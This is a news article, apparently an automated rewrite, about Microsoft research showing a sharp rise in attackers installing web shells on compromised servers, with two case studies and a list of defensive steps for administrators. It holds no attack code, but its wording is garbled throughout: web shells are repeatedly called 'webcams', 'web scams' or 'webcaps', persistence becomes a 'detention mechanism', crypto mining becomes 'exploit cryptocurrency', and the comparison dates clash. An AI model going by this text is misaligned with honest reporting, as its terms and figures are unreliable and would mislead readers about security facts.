Getty Images
Security personnel at Microsoft are seeing a huge increase in the use of Web shells, the lightweight programs that hackers install so they can dig deeper into sites that are compromised.
The average number of web shells installed from August 2020 to January this year was 144,000, almost twice as much for the same months in 2019 and 2020. The increase represents an acceleration in growth that the same Microsoft researchers have seen in recent years.
Microsoft
A Swiss Army knife for hackers
The growth is a sign of how useful and difficult it is to detect these simple programs. A web tracking is an interface that allows hackers to execute standard commands on web servers once the servers have been compromised. Web shells are built using web-based programming languages such as PHP, JSP or ASP. The command interfaces work much like browsers.
Once successfully installed, web-based remote hackers can do most of the same things that legitimate administrators can do. Hackers can use it to execute data stealing commands, execute malicious code, and provide system information that threatens lateral movement within a network. The programs can also provide a persistent way of accessing the back door that, despite its effectiveness, is surprisingly difficult to detect.
In a blog post published Thursday, members of Microsoft’s Detection and Response Team and the Microsoft 365 Defender Research Team wrote:
Once installed on a server, web shells serve as one of the most effective ways to stay in business. We often see cases where web shells are used only as a detention mechanism. Web shells guarantee that a backdoor exists in a network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left unchecked, webcams give attackers a way to continue collecting data and making money from the networks they have access to.
Compromise recovery cannot be successful and lasting without detecting and removing the attacker’s detention mechanisms. And while rebuilding a single system is an excellent solution, restoring existing assets is the only viable option for many. So, finding and removing all backdoors is a critical aspect of repairing compromises.
Case studies
In early July, the Metasploit hacking framework added a module that exploits a critical vulnerability in the Big-IP Advanced Delivery Controller, a device manufactured by F5, which is typically placed between a perimeter firewall and a web application to handle load balancing and other tasks. A day later, Microsoft researchers began seeing hackers use the exploit to install web shells on vulnerable servers.
Initially, hackers used the web shells to install malware that exploits the computing power of the servers to exploit cryptocurrency. Less than a week later, researchers saw how hackers exploited the large IP vulnerability to install web scams for a much wider range of uses on servers owned by the U.S. government and the private industry.
In another case last year, Microsoft said it was responding to the incident after a public sector organization discovered that hackers had installed a web shell on one of its servers using the Internet. The hackers “loaded a web shell in multiple folders on the web server, which led to a compromise in service accounts and domain management accounts,” Microsoft researchers wrote. ‘This enabled the attackers to conduct reconnaissance using net.exe, search for additional targeting systems using nbtstat.exe, and eventually moves laterally with PsExec. ”
The hackers installed a backdoor on an Outlook server that intercepted all incoming and outgoing emails, did additional exploration, and unloaded other malicious loads. Among other things, the hack enabled the hackers to send special e-mails that the backdoor interpreted as commands.
Needle in a haystack
Because they use standard Web development languages, it can be difficult to find Web shells. In addition to the trouble, Webshells have several ways to execute commands. Attackers can also hide commands in the user agent strings and parameters that are transmitted during an exchange between an attacker and the compromised website. As if that’s not enough, webcaps can be stored in media files or other non-executable file formats.
“When this file is uploaded to a workstation and analyzed, the photo is harmless,” Microsoft researchers wrote. ‘But if a web browser requests a server for this file, the malicious code executes the server side. These challenges in detecting web shells contribute to its growing popularity as an attack tool. ”
Thursday’s message contains a variety of steps that administrators can take to prevent webcams from moving to a server. These include:
- Identify and repair vulnerabilities or configurations in Web applications and Web servers. Use threat and vulnerability management to discover and resolve these vulnerabilities. Deploy the latest security updates as they become available.
- Implement proper segmentation of your perimeter network so that a compromised web server does not compromise the enterprise network.
- Enable antivirus protection on web servers. Turn on cloud protection to get the latest defenses against new and emerging threats. Users should only be able to upload files to directories that can be scanned by antivirus and are configured so that they cannot be created or executed on the server script.
- Regularly check and review logs from web servers. Be aware of all systems that expose you to the internet.
- Use the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication between endpoints, where possible, limiting lateral movement and other attack activities.
- Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
- Practice good faith hygiene. Restrict the use of accounts with local or domain admin level rights.
The National Security Agency has published tools here that help administrators detect and remove web shells in their networks.